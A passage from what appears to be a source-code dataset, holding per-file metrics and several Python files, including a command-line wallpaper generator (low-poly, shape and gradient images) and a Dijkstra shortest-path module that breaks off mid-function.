| 0.071226
| 0.019347
| 0.040219
| 0.040671
| 0.823053
| 0.798311
| 0.768288
| 0.738293
| 0.72379
| 0.706462
| 0
| 0.00923
| 0.293009
| 121,829
| 3,251
| 191
| 37.474316
| 0.812903
| 0.458134
| 0
| 0.695958
| 0
| 0
| 0.021728
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.010545
| 0.019332
| null | null | 0.000879
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc8193f1052a432837102d0bf5580b838395d468
| 100
|
py
|
Python
|
BasicFunction.py
|
KinGitY/uhdl_core
|
40b335e11624d8ab40d8fe0772787e9bcec0b268
|
[
"MIT"
] | null | null | null |
BasicFunction.py
|
KinGitY/uhdl_core
|
40b335e11624d8ab40d8fe0772787e9bcec0b268
|
[
"MIT"
] | 1
|
2020-09-13T13:14:58.000Z
|
2020-09-13T13:24:24.000Z
|
BasicFunction.py
|
KinGitY/uhdl_core
|
40b335e11624d8ab40d8fe0772787e9bcec0b268
|
[
"MIT"
] | 1
|
2020-09-10T14:06:37.000Z
|
2020-09-10T14:06:37.000Z
|
def join_name(*args, join_str='_'):
    """Join the given name parts with *join_str*, skipping any that are None."""
    parts = (part for part in args if part is not None)
    return join_str.join(parts)
| 14.285714
| 60
| 0.66
| 20
| 100
| 3.1
| 0.65
| 0.225806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21
| 100
| 6
| 61
| 16.666667
| 0.78481
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d5f3ea0a34a6c0aa52a950f42cc4b8b40af1d7ee
| 16,213
|
py
|
Python
|
wallgen.py
|
pablorgr/wallgen
|
a5624fbbd962b4cae49dd4b1fac7064a86ef139a
|
[
"MIT"
] | null | null | null |
wallgen.py
|
pablorgr/wallgen
|
a5624fbbd962b4cae49dd4b1fac7064a86ef139a
|
[
"MIT"
] | null | null | null |
wallgen.py
|
pablorgr/wallgen
|
a5624fbbd962b4cae49dd4b1fac7064a86ef139a
|
[
"MIT"
] | null | null | null |
import sys
import time
import click
import numpy as np
from skimage import color
from tools.wallpaper import setwallpaper
from tools.points import (
genPoints,
genSmartPoints)
from tools.gradient import (
Image,
NbyNGradient,
nGradient,
random_gradient,
swirl_image)
from tools.shapes import (
drawSlants,
genDiamond,
genHexagon,
genIsometric,
genPoly,
genSquares,
genTriangle)
# Shared click settings: accept both -h and --help on every command.
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.group(context_settings=CONTEXT_SETTINGS)
def cli():
    """Root command group for wallgen; the subcommands do the actual work."""
    pass
@cli.command()
@click.argument("side", type=click.INT, metavar="PIXELS")
@click.option("--colors", "-c", multiple=True, type=click.STRING,
              metavar="#HEXCODE", help="Use many colors in a custom gradient")
@click.option("--points", "-p", default=100, metavar="no-of-points",
              help="Number of points to use, default = 100")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
              metavar="#HEXCODE", help="Outline the triangles")
@click.option("--name", "-n", metavar="/path/to/output_file",
              help="Rename the output file")
@click.option("--only-color", "-oc", is_flag=True,
              help="Generate just a gradient image")
@click.option("--use-nn", "-un", is_flag=True,
              help="Use NbyNGradient function")
@click.option("--swirl", "-sw", type=click.INT, metavar="STRENGTH",
              help="Swirl the gradient. [1-10]")
@click.option("--scale", "-sc", default=2,
              help="""Scale image to do anti-aliasing. Default=2. scale=1 means
              no antialiasing. [WARNING: Very memory expensive]""")
@click.option("--set-wall", "-w", is_flag=True,
              help="Set the generated image as your Desktop wallpaper")
def poly(
        side,
        points,
        show,
        colors,
        outline,
        name,
        only_color,
        use_nn,
        swirl,
        scale,
        set_wall):
    """ Generates a HQ low poly image using a gradient """
    # --- argument validation: only the first failing check is reported ---
    error = ""
    if side < 50:
        error = "Image too small. Minimum size 50"
    elif points < 3:
        error = "Too less points. Minimum points 3"
    elif points > 200000:
        error = "Too many points. Maximum points 200000"
    elif scale < 1:
        error = "Invalid scale value"
    if error:
        click.secho(error, fg='red', err=True)
        sys.exit(1)
    side = side * scale  # increase size to anti alias
    shift = side // 10
    nside = side + shift * 2  # increase size to prevent underflow
    # --- pick the gradient source: explicit colors, NxN, or random ---
    if colors:
        if len(colors) < 2:
            click.secho("One color gradient not possible.", fg="red", err=True)
            sys.exit(1)
        # "#RRGGBB" hex strings -> (r, g, b) byte tuples
        cs = [tuple(bytes.fromhex(c[1:])) for c in colors]
        img = nGradient(nside, *cs)
    else:
        if use_nn:
            points = 1000 if points < 1000 else points
            img = NbyNGradient(nside)
        else:
            img = random_gradient(nside)
    if swirl:
        # for a color-only image, downscale before swirling so the swirl
        # is applied at the final output size
        if only_color:
            img = img.resize((side // scale, side // scale),
                             resample=Image.BICUBIC)
        img = swirl_image(img, swirl)
    # --- triangulate the gradient unless only a plain gradient was asked ---
    if not only_color:
        if outline:
            try:
                outline = tuple(bytes.fromhex(outline[1:]))
            except Exception:
                click.secho("Invalid color hex", fg='red', err=True)
                sys.exit(1)
        print("Preparing image", end="")
        pts = genPoints(points, nside, nside)
        print("\r", end="")
        print("Generated points", end="")
        img = genPoly(side, side, img, pts, shift, shift, outl=outline)
        print("\r", end="")
        print("Making final tweaks", end="")
        # downscale by `scale` to realize the anti-aliasing
        img = img.resize((side // scale, side // scale),
                         resample=Image.BICUBIC)
    if show:
        img.show()
    # --- save: explicit name or a timestamped default ---
    file_name = ""
    if name:
        file_name = "{}.png".format(name)
        img.save(file_name)
    else:
        file_name = "wall-{}.png".format(int(time.time()))
        img.save(file_name)
    print("\r", end="")
    print(f"Image is stored at {file_name}")
    if set_wall:
        msg, ret = setwallpaper(file_name)
        if ret:
            click.secho(msg, fg="green")
        else:
            click.secho(msg, fg="red")
@cli.command()
@click.argument("side", type=click.INT, metavar="PIXELS")
@click.option("--type",
              "-t",
              "shape",
              metavar="[sq/hex/dia/tri/iso]",
              type=click.Choice(['sq',
                                 'hex',
                                 'dia',
                                 'tri',
                                 'iso']),
              help="""
Choose which shape to use.
[Square/Hexagons/Diamonds/Triangles/Isometric]
""")
@click.option("--colors", "-c", multiple=True, type=click.STRING,
              metavar="#HEXCODE", help="Use many colors in a custom gradient")
@click.option("--percent", "-p", type=click.INT, metavar="1-10", default=1,
              help="Use this percentage to determine number of polygons. [1-10]\
")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
              metavar="#HEXCODE", help="Outline the shapes")
@click.option("--name", "-n", metavar="/path/to/output_file",
              help="Rename the output file")
@click.option("--use-nn", "-un", is_flag=True,
              help="Use NbyNGradient function")
@click.option("--swirl", "-sw", type=click.INT, metavar="STRENGTH",
              help="Swirl the gradient. [1-10]")
@click.option("--scale", "-sc", default=2,
              help="""Scale image to do anti-aliasing. Default=2. scale=1 means
no antialiasing. [WARNING: Very memory expensive]""")
@click.option("--set-wall", "-w", is_flag=True,
              help="Set the generated image as your Desktop wallpaper")
def shape(
        side,
        shape,
        colors,
        show,
        outline,
        name,
        percent,
        use_nn,
        swirl,
        scale,
        set_wall):
    """Generate a HQ wallpaper tiling a chosen shape over a gradient."""
    error = ""
    if side < 50:
        error = "Image too small. Minimum size 50"
    # NOTE(review): a percent failure overwrites a pending side failure,
    # so only the last error is reported (both still abort with exit 1).
    if percent is not None:
        if percent < 1 or percent > 10:
            error = "Error {} : Percent range 1-10".format(percent)
    if error:
        click.secho(error, fg='red', err=True)
        sys.exit(1)
    side = side * scale  # increase size to anti alias
    if colors:
        # Custom gradient: needs at least two "#RRGGBB" stops.
        if len(colors) < 2:
            click.secho("One color gradient not possible.", fg="red", err=True)
            sys.exit(1)
        cs = [tuple(bytes.fromhex(c[1:])) for c in colors]
        img = nGradient(side, *cs)
    else:
        if use_nn:
            img = NbyNGradient(side)
        else:
            img = random_gradient(side)
    if swirl:
        img = swirl_image(img, swirl)
    if outline:
        # "#RRGGBB" -> (r, g, b) tuple for the shape outlines.
        try:
            outline = tuple(bytes.fromhex(outline[1:]))
        except Exception:
            click.secho("Invalid color hex", fg='red', err=True)
            sys.exit(1)
    print("Preparing image", end="")
    if shape == 'hex':
        # NOTE(review): dead in practice — percent defaults to 1, so it is
        # never falsy and the 5 fallback never applies.
        percent = percent if percent else 5
        img = genHexagon(side, side, img, outline, per=(percent or 1))
    elif shape == 'sq':
        img = genSquares(side, side, img, outline, per=(percent or 1))
    elif shape == 'dia':
        img = genDiamond(side, side, img, outline, per=(percent or 1))
    elif shape == 'tri':
        img = genTriangle(side, side, img, outline, per=(percent or 1))
    elif shape == 'iso':
        img = genIsometric(side, side, img, outline, per=(percent or 1))
    else:
        error = """
No shape given. To see list of shapes \"wallgen shape --help\"
"""
        click.secho(error, fg='red', err=True)
        sys.exit(1)
    print("\r", end="")
    print("Making final tweaks", end="")
    # Downscale back to the requested size (anti-aliasing pass).
    img = img.resize((side // scale, side // scale), resample=Image.BICUBIC)
    if show:
        img.show()
    file_name = ""
    if name:
        file_name = "{}.png".format(name)
        img.save(file_name)
    else:
        file_name = "wall-{}.png".format(int(time.time()))
        img.save(file_name)
    print("\r", end="")
    print(f"Image is stored at {file_name}")
    if set_wall:
        msg, ret = setwallpaper(file_name)
        if ret:
            click.secho(msg, fg="green")
        else:
            click.secho(msg, fg="red")
@cli.command()
@click.argument("side", type=click.INT, metavar="PIXELS")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--name", "-n", help="Rename the output")
@click.option("--swirl", "-sw", type=click.INT, metavar="STRENGTH",
              help="Swirl the gradient. [1-10]")
@click.option("--set-wall", "-w", is_flag=True,
              help="Set the generated image as your Desktop wallpaper")
def slants(side, show, name, swirl, set_wall):
    """ Generates slanting lines of various colors """
    # Render at twice the requested size, then downscale (anti-aliasing).
    factor = 2
    side = side * factor
    print("Preparing image", end="")
    img = drawSlants(side)
    print("\r", end="")
    print("Making final tweaks", end="")
    img = img.resize((side // factor, side // factor),
                     resample=Image.BICUBIC)
    if swirl:
        img = swirl_image(img, swirl)
    if show:
        img.show()
    # Explicit name wins; otherwise fall back to a timestamped file.
    file_name = ("{}.png".format(name) if name
                 else "wall-{}.png".format(int(time.time())))
    img.save(file_name)
    print("\r", end="")
    print(f"Image is stored at {file_name}")
    if set_wall:
        msg, ret = setwallpaper(file_name)
        click.secho(msg, fg="green" if ret else "red")
@cli.group()
def pic():
    """ Use a picture instead of a gradient """
    # click group only: the subcommands ("poly", "shape") registered on it
    # operate on an input image; the group body itself does nothing.
@pic.command()
@click.argument("image", type=click.Path(exists=True, dir_okay=False))
@click.option("--points", "-p", default=1000, metavar="no-of-points",
              help="Number of points to use, default = 1000")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
              metavar="#HEXCODE", help="Outline the triangles")
@click.option("--name", "-n", metavar="/path/to/output_file",
              help="Rename the output file")
@click.option("--smart", "-sm", is_flag=True, help="Use smart points")
@click.option("--set-wall", "-w", is_flag=True,
              help="Set the generated image as your Desktop wallpaper")
def poly(image, points, show, outline, name, smart, set_wall):  # noqa: F811
    """Triangulate an existing picture into a HQ low-poly image.

    With --smart, sample points are derived from image edges (Sobel via
    scikit-image); otherwise `points` random points are used.
    """
    # Validate point count; `error` stays None on success.
    if points < 3:
        error = "Too less points. Minimum points 3"
    elif points > 200000:
        error = "Too many points. Maximum points {}".format(200000)
    else:
        error = None
    if error:
        click.secho(error, fg='red', err=True)
        sys.exit(1)
    if outline:
        # "#RRGGBB" -> (r, g, b) tuple for the triangle outlines.
        try:
            outline = tuple(bytes.fromhex(outline[1:]))
        except Exception:
            click.secho("Invalid color hex", fg='red', err=True)
            sys.exit(1)
    print("Preparing image", end="")
    img = Image.open(image)
    width = img.width
    height = img.height
    # Pad the sampling area by 1% on each side so triangles cover the
    # borders of the picture.
    wshift = width // 100
    hshift = height // 100
    n_width = width + 2 * wshift
    n_height = height + 2 * hshift
    if smart:
        # Edge-aware sampling (Sobel): denser points along edges.
        ski_img = np.array(img)
        gray_img = color.rgb2gray(ski_img)
        pts = genSmartPoints(gray_img)
    else:
        pts = genPoints(points, n_width, n_height)
    print("\r", end="")
    print("Generated points", end="")
    final_img = genPoly(img.width, img.height, img, pts,
                        wshift, hshift, outline, pic=True)
    print("\r", end="")
    print("Making final tweaks", end="")
    if show:
        final_img.show()
    file_name = ""
    if name:
        file_name = "{}.png".format(name)
        final_img.save(file_name)
    else:
        # Default: timestamped file in the current directory.
        file_name = "wall-{}.png".format(int(time.time()))
        final_img.save(file_name)
    print("\r", end="")
    print(f"Image is stored at {file_name}")
    if set_wall:
        msg, ret = setwallpaper(file_name)
        if ret:
            click.secho(msg, fg="green")
        else:
            click.secho(msg, fg="red")
@pic.command()
@click.argument("image", type=click.Path(exists=True, dir_okay=False))
@click.option("--type",
              "-t",
              "shape",
              type=click.Choice(['sq',
                                 'hex',
                                 'dia',
                                 'tri',
                                 'iso']),
              metavar="[sq/hex/dia/tri/iso]",
              help="""
Choose which shape to use.
[Square/Hexagons/Diamonds/Triangles/Isometric]
""")
@click.option("--percent", "-p", type=click.INT, metavar="1-10",
              help="""
Use this percentage to determine number of polygons. [1-10]
""")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
              metavar="#HEXCODE", help="Outline the shapes")
@click.option("--name",
              "-n",
              metavar="/path/to/output_file",
              help="Rename the output")
@click.option("--set-wall", "-w", is_flag=True,
              help="Set the generated image as your Desktop wallpaper")
def shape(image, shape, show, outline, name, percent, set_wall):  # noqa: F811
    """Tile an existing picture with a chosen shape.

    Unlike the gradient-based `shape` command, --percent has no default
    here; every branch now falls back to 1 (hex keeps its 5 default) so
    the gen* helpers never receive per=None.
    """
    error = None
    if percent:
        if percent < 1 or percent > 10:
            error = "Percent range 1-10"
    if error:
        click.secho(error, fg='red', err=True)
        sys.exit(1)
    img = Image.open(image)
    width = img.width
    height = img.height
    if outline:
        # "#RRGGBB" -> (r, g, b) tuple for the shape outlines.
        try:
            outline = tuple(bytes.fromhex(outline[1:]))
        except Exception:
            click.secho("Invalid color hex", fg='red', err=True)
            sys.exit(1)
    print("Preparing image", end="")
    if shape == 'hex':
        percent = percent if percent else 5
        img = genHexagon(width, height, img, outline, pic=True, per=percent)
    elif shape == 'sq':
        # FIX: guard with `or 1` — percent may be None when --percent is
        # omitted (no default on this command); mirrors the gradient
        # `shape` command instead of passing per=None to the helpers.
        img = genSquares(width, height, img, outline, pic=True,
                         per=(percent or 1))
    elif shape == 'dia':
        img = genDiamond(width, height, img, outline, pic=True,
                         per=(percent or 1))
    elif shape == 'tri':
        img = genTriangle(width, height, img, outline, pic=True,
                          per=(percent or 1))
    elif shape == 'iso':
        img = genIsometric(width, height, img, outline, pic=True,
                           per=(percent or 1))
    else:
        error = """
No shape given. To see list of shapes \"wallgen pic shape --help\"
"""
        click.secho(error, fg='red', err=True)
        sys.exit(1)
    print("\r", end="")
    print("Making final tweaks", end="")
    if show:
        img.show()
    file_name = ""
    if name:
        file_name = "{}.png".format(name)
        img.save(file_name)
    else:
        # Default: timestamped file in the current directory.
        file_name = "wall-{}.png".format(int(time.time()))
        img.save(file_name)
    print("\r", end="")
    print(f"Image is stored at {file_name}")
    if set_wall:
        msg, ret = setwallpaper(file_name)
        if ret:
            click.secho(msg, fg="green")
        else:
            click.secho(msg, fg="red")
if __name__ == "__main__":
    # Script entry point: dispatch to the click command group.
    cli()
| 31.299228
| 81
| 0.533461
| 1,943
| 16,213
| 4.397838
| 0.118888
| 0.046343
| 0.017554
| 0.022937
| 0.819193
| 0.784903
| 0.772499
| 0.758923
| 0.728847
| 0.720889
| 0
| 0.013694
| 0.319867
| 16,213
| 517
| 82
| 31.359768
| 0.761222
| 0.029791
| 0
| 0.750588
| 0
| 0
| 0.210273
| 0.006066
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016471
| false
| 0.002353
| 0.021176
| 0
| 0.037647
| 0.068235
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91270810635f98543f35ed255b4d392e6dd566c6
| 127
|
py
|
Python
|
exp.py
|
HuakunShen/cron-crawler-template
|
00993b2edbb02dc945450969afba3a8b8aaa9fb0
|
[
"MIT"
] | null | null | null |
exp.py
|
HuakunShen/cron-crawler-template
|
00993b2edbb02dc945450969afba3a8b8aaa9fb0
|
[
"MIT"
] | 2
|
2022-03-18T16:45:21.000Z
|
2022-03-18T16:45:49.000Z
|
exp.py
|
HuakunShen/cron-crawler-template
|
00993b2edbb02dc945450969afba3a8b8aaa9fb0
|
[
"MIT"
] | null | null | null |
import importlib
# mod = importlib.import_module("jobs.worldtime")
# print(hasattr(mod, "Job"))
# print(hasattr(mod, "Jobs"))
| 21.166667
| 49
| 0.708661
| 16
| 127
| 5.5625
| 0.5625
| 0.269663
| 0.337079
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102362
| 127
| 5
| 50
| 25.4
| 0.780702
| 0.80315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e66fa03db66689d698cec4c68ffb2345dad152b4
| 229
|
py
|
Python
|
tests/mocks/__init__.py
|
Informasjonsforvaltning/fdk-model-publisher
|
f9f2434436fbbc4e66a9747d8fb2b7f07bb76533
|
[
"Apache-2.0"
] | null | null | null |
tests/mocks/__init__.py
|
Informasjonsforvaltning/fdk-model-publisher
|
f9f2434436fbbc4e66a9747d8fb2b7f07bb76533
|
[
"Apache-2.0"
] | 34
|
2020-10-21T05:54:34.000Z
|
2022-02-04T12:47:55.000Z
|
tests/mocks/__init__.py
|
Informasjonsforvaltning/fdk-model-publisher
|
f9f2434436fbbc4e66a9747d8fb2b7f07bb76533
|
[
"Apache-2.0"
] | null | null | null |
"""Initialize mocks."""
from .data_services_catalog_ttl import data_services_catalog_ttl_mock
from .skagerrak_sparebank_json import skagerrak_sparebank_json_mock
from .skagerrak_sparebank_ttl import skagerrak_sparebank_ttl_mock
| 38.166667
| 69
| 0.89083
| 31
| 229
| 6.032258
| 0.387097
| 0.385027
| 0.203209
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065502
| 229
| 5
| 70
| 45.8
| 0.873832
| 0.074236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6bacb0f7117086b77b371afbaf9b99e1d6d4ed8
| 12,354
|
py
|
Python
|
control/shortestpath/dijkstra_sc.py
|
gmarciani/ipath
|
6c367b969fd5363c92672ebabfd4e2b01e866af4
|
[
"MIT"
] | null | null | null |
control/shortestpath/dijkstra_sc.py
|
gmarciani/ipath
|
6c367b969fd5363c92672ebabfd4e2b01e866af4
|
[
"MIT"
] | null | null | null |
control/shortestpath/dijkstra_sc.py
|
gmarciani/ipath
|
6c367b969fd5363c92672ebabfd4e2b01e866af4
|
[
"MIT"
] | null | null | null |
from common_sc import get_random_nodes, get_couples_sc, get_couples_sc_isolated_test
from time import clock
from model.tree import RelationTree as Tree
from model.priority_queue import DHeap as PriorityQueue
from sets import Set
# Sentinel cost for nodes not yet reached by the search.
INFINITE = float("inf")
# No minimization constraint (baseline variant).
def dijkstra_sc_0(graph, numNodes, maxDistance = INFINITE):
    """Run single-couple Dijkstra for numNodes random node pairs.

    Returns a Set of (couple, path, cost) tuples, one per couple
    produced by get_couples_sc; see _dijkstra_sc_0 for each run.
    """
    randomNodes = get_random_nodes(graph, numNodes)
    couples = get_couples_sc(randomNodes, maxDistance)
    result = Set()
    for couple in couples:
        rootNode = couple[0]
        destNode = couple[1]
        data = _dijkstra_sc_0(graph, rootNode, destNode, maxDistance)
        result.add(data)
    return result
def _dijkstra_sc_0(graph, rootNode, destNode, maxDistance):
    """Dijkstra from rootNode; return ((root_id, dest_id), path, cost).

    path is None (and cost INFINITE) when destNode is unreachable.
    NOTE(review): maxDistance is accepted but never used here.
    """
    # Run-unique sentinel (clock timestamp): arcs carrying this status
    # were already walked during THIS run and are skipped.
    NOT_WALKABLE = clock()
    pathTree = Tree(rootNode._id)
    pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
    pathCost[rootNode._id] = 0.0
    Q = PriorityQueue()
    Q.insert(rootNode._id, 0.0)
    while not Q.is_empty():
        minNodeId = Q.delete_min().element
        for arc in graph.get_incident_arcs(minNodeId):
            if arc.status == NOT_WALKABLE: continue
            tailNodeCost = pathCost[minNodeId]
            arcCost = arc.info  # arc weight is stored in .info
            headNodeId = arc._head
            headNodeCost = pathCost[headNodeId]
            if headNodeCost == INFINITE:
                # First time this node is reached: record cost and tree
                # edge, then block the reverse arc so we never walk back.
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.insert(headNodeId, newCost)
                pathTree.insert(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
            elif (tailNodeCost + arcCost) < headNodeCost:
                # Cheaper path found: unblock the old reverse arc,
                # re-parent in the tree, decrease the key, block the new
                # reverse arc.
                prevFatherNodeId = pathTree.get_father(headNodeId)
                graph.set_arc_status(headNodeId, prevFatherNodeId, None)
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.decrease_key(headNodeId, newCost)
                pathTree.make_son(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
    couple = (rootNode._id, destNode._id)
    try:
        path = pathTree.get_path_to(destNode._id)
    except KeyError:
        # Destination never entered the tree: unreachable.
        path = None
    cost = pathCost[destNode._id]
    return (couple, path, cost)
# Constraint 1 minimizing |V(G)|: prune nodes costlier than the best
# known cost to the destination.
def dijkstra_sc_1(graph, numNodes, maxDistance = INFINITE):
    """As dijkstra_sc_0, but using the pruned variant _dijkstra_sc_1."""
    randomNodes = get_random_nodes(graph, numNodes)
    couples = get_couples_sc(randomNodes, maxDistance)
    result = Set()
    for couple in couples:
        rootNode = couple[0]
        destNode = couple[1]
        data = _dijkstra_sc_1(graph, rootNode, destNode, maxDistance)
        result.add(data)
    return result
def _dijkstra_sc_1(graph, rootNode, destNode, maxDistance):
    """Dijkstra with pruning constraint 1.

    Nodes whose tentative cost already exceeds the best known cost to
    destNode are flagged OUT_OF_RANGE and skipped from then on.
    Returns ((root_id, dest_id), path, cost); path is None when
    destNode is unreachable.
    NOTE(review): maxDistance is accepted but never used here.
    """
    # Run-unique sentinels derived from the clock: OUT_OF_RANGE marks
    # pruned nodes, NOT_WALKABLE marks arcs already walked in this run.
    OUT_OF_RANGE = - rootNode._id - clock()
    NOT_WALKABLE = clock()
    pathTree = Tree(rootNode._id)
    pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
    pathCost[rootNode._id] = 0.0
    Q = PriorityQueue()
    Q.insert(rootNode._id, 0.0)
    while not Q.is_empty():
        minNodeId = Q.delete_min().element
        for arc in graph.get_incident_arcs(minNodeId):
            if arc.status == NOT_WALKABLE: continue
            headNodeId = arc._head
            headNode = graph.get_node_by_id(headNodeId)
            if headNode.status == OUT_OF_RANGE: continue
            else:
                # Constraint 1: this node cannot improve on the current
                # best cost to the destination -> prune it.
                newCost = pathCost[minNodeId] + arc.info
                if newCost >= pathCost[destNode._id]:
                    headNode.status = OUT_OF_RANGE
                    continue
            tailNodeCost = pathCost[minNodeId]
            arcCost = arc.info
            headNodeCost = pathCost[headNodeId]
            if headNodeCost == INFINITE:
                # First visit: record cost/tree edge, block reverse arc.
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.insert(headNodeId, newCost)
                pathTree.insert(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
            elif (tailNodeCost + arcCost) < headNodeCost:
                # Cheaper path found: re-parent, decrease key, swap the
                # blocked reverse arc.
                prevFatherNodeId = pathTree.get_father(headNodeId)
                graph.set_arc_status(headNodeId, prevFatherNodeId, None)
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.decrease_key(headNodeId, newCost)
                pathTree.make_son(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
    couple = (rootNode._id, destNode._id)
    try:
        path = pathTree.get_path_to(destNode._id)
    except KeyError:
        # Destination never entered the tree: unreachable.
        path = None
    cost = pathCost[destNode._id]
    return (couple, path, cost)
# Constraints 1 and 2 minimizing |V(G)|.
def dijkstra_sc_2(graph, numNodes, maxDistance = INFINITE):
    """As dijkstra_sc_1, but couples are pre-screened for isolation.

    get_couples_sc_isolated_test yields 3-tuples; a non-None third
    element presumably flags an isolated/disconnected couple (verify in
    common_sc) — those are reported directly as (ids, None, INFINITE)
    without running Dijkstra.
    """
    randomNodes = get_random_nodes(graph, numNodes)
    couples = get_couples_sc_isolated_test(randomNodes, maxDistance)
    result = Set()
    # Couples that passed the isolation test: run the pruned Dijkstra.
    for couple in [c for c in couples if c[2] is None]:
        rootNode = couple[0]
        destNode = couple[1]
        data = _dijkstra_sc_2(graph, rootNode, destNode, maxDistance)
        result.add(data)
    # Flagged couples: unreachable by construction, skip the search.
    for couple in [c for c in couples if c[2] is not None]:
        rootNode = couple[0]
        destNode = couple[1]
        data = ((rootNode._id, destNode._id), None, INFINITE)
        result.add(data)
    return result
def _dijkstra_sc_2(graph, rootNode, destNode, maxDistance):
    """Pruned Dijkstra used by dijkstra_sc_2.

    Identical body to _dijkstra_sc_1 (constraint 1 pruning); the
    "constraint 2" of this variant lives in the caller's isolation
    pre-screening. Returns ((root_id, dest_id), path, cost).
    NOTE(review): maxDistance is accepted but never used here.
    """
    # Run-unique sentinels: OUT_OF_RANGE marks pruned nodes,
    # NOT_WALKABLE marks arcs already walked in this run.
    OUT_OF_RANGE = - rootNode._id - clock()
    NOT_WALKABLE = clock()
    pathTree = Tree(rootNode._id)
    pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
    pathCost[rootNode._id] = 0.0
    Q = PriorityQueue()
    Q.insert(rootNode._id, 0.0)
    while not Q.is_empty():
        minNodeId = Q.delete_min().element
        for arc in graph.get_incident_arcs(minNodeId):
            if arc.status == NOT_WALKABLE: continue
            headNodeId = arc._head
            headNode = graph.get_node_by_id(headNodeId)
            if headNode.status == OUT_OF_RANGE: continue
            else:
                # Constraint 1: prune nodes that cannot beat the current
                # best cost to the destination.
                newCost = pathCost[minNodeId] + arc.info
                if newCost >= pathCost[destNode._id]:
                    headNode.status = OUT_OF_RANGE
                    continue
            tailNodeCost = pathCost[minNodeId]
            arcCost = arc.info
            headNodeCost = pathCost[headNodeId]
            if headNodeCost == INFINITE:
                # First visit: record cost/tree edge, block reverse arc.
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.insert(headNodeId, newCost)
                pathTree.insert(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
            elif (tailNodeCost + arcCost) < headNodeCost:
                # Cheaper path found: re-parent, decrease key, swap the
                # blocked reverse arc.
                prevFatherNodeId = pathTree.get_father(headNodeId)
                graph.set_arc_status(headNodeId, prevFatherNodeId, None)
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.decrease_key(headNodeId, newCost)
                pathTree.make_son(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
    couple = (rootNode._id, destNode._id)
    try:
        path = pathTree.get_path_to(destNode._id)
    except KeyError:
        # Destination never entered the tree: unreachable.
        path = None
    cost = pathCost[destNode._id]
    return (couple, path, cost)
# Constraints 1, 2 and 3 minimizing |V(G)|.
def dijkstra_sc_3(graph, numNodes, maxDistance = INFINITE):
    """As dijkstra_sc_2, but using _dijkstra_sc_3 (adds constraint 3:
    degree-1 dead ends other than the destination are pruned)."""
    randomNodes = get_random_nodes(graph, numNodes)
    couples = get_couples_sc_isolated_test(randomNodes, maxDistance)
    result = Set()
    # Couples that passed the isolation test: run the pruned Dijkstra.
    for couple in [c for c in couples if c[2] is None]:
        rootNode = couple[0]
